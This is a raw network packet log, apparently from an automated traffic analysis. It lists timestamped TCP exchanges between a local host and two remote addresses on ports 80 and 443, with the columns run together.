                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.861233950 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.861304998 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.862318993 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.862438917 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.862509966 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.863509893 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.863643885 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.863714933 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.864694118 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.864741087 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.864814043 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.865895033 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.866008997 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.866084099 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.867054939 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.867185116 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.867257118 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.868253946 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.868391991 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.868462086 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.869461060 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.869544029 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.869621038 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.981642962 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.981782913 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.985336065 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.985351086 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.986268997 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.988832951 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.988853931 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.988924026 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000081062 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000096083 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000174046 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000384092 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000719070 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000771046 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000899076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.000941992 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.001836061 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.002161026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.002209902 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.002969980 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.003088951 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.003139019 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.004137039 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.004185915 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.004244089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.005172014 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.005310059 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.005429029 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.005485058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.006488085 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.006619930 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.006666899 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.007652998 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.007698059 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.007776022 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.008507013 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.008835077 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.008882999 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.009042978 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.009085894 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.009999037 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.010061979 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.010116100 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.010152102 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.011183977 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.011231899 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.011358023 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.011400938 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.012367010 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.012470961 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.012514114 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.013529062 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.013607979 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.013650894 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.014744043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.014856100 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.014899015 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.015927076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.015969992 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.016031027 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.017055988 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.017102957 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.017185926 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.018249035 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.018299103 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.018716097 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.018769979 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.019444942 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.019455910 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.019504070 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.020589113 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.021060944 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.021322012 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.021627903 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.021755934 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.021846056 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.022119999 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.022178888 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.022952080 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.023010015 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.023695946 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.023758888 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.024123907 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.024179935 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.024607897 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.024681091 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.025302887 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.025352955 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.026530981 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.026542902 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.026575089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.026590109 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.026624918 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.027632952 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.027772903 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.027846098 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.028817892 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.029052019 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.029126883 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.030028105 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.031223059 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.031235933 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.031246901 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.031305075 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.032330990 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.032403946 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.033091068 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.033534050 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.033610106 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.033663988 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.034698009 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.034770966 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.034781933 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.035537958 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.035871983 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.037082911 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.037094116 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.037162066 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.037314892 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.037381887 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.038230896 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.038558960 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.039352894 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.039417982 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.039428949 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.039491892 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.040560961 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.040633917 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.040997028 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.041779041 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.041850090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.042496920 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.042926073 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.042999029 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.043064117 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.044111967 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.044184923 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.044852018 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.045275927 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.045346022 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.046473026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.046484947 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.046524048 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.046551943 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.046596050 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.047697067 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.047832966 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.047902107 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.048808098 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.049186945 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.049261093 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.050000906 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.050115108 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.050193071 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.051177025 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.051541090 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.051610947 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.052333117 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.052818060 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.052890062 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.053514957 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.053762913 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.053836107 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.054680109 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.055646896 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.055716038 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.055849075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.056534052 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.056597948 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.057065964 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.057138920 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.057743073 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.058275938 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.058289051 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.058352947 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.059458971 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.059472084 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.059530973 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.060595036 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.060663939 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.060692072 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.060784101 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.191963911 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.192020893 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.192233086 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.192285061 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.192598104 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.192647934 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.192807913 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.192853928 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.193701029 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.193779945 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.193981886 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.194031000 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.194859028 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.194907904 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.195451975 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.195512056 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.196079969 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.196120024 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.196618080 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.197235107 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.197253942 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.197273016 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.197422981 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.197468996 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.198399067 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.198486090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.199250937 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.199539900 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.199569941 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.199614048 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.199700117 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.199743032 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.200750113 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.200800896 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.201977015 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.201989889 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.202001095 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.202027082 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.202040911 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.203104973 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.203144073 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.203217983 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.204318047 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.204360008 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.204448938 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.204500914 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.205498934 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.205626011 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.205775023 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.205821037 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.206666946 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.206722975 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.206881046 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.206942081 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.207818031 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.207870960 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.208138943 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.208200932 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.208981037 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.209033012 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.209103107 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.209284067 CET4991080192.168.2.531.41.244.11
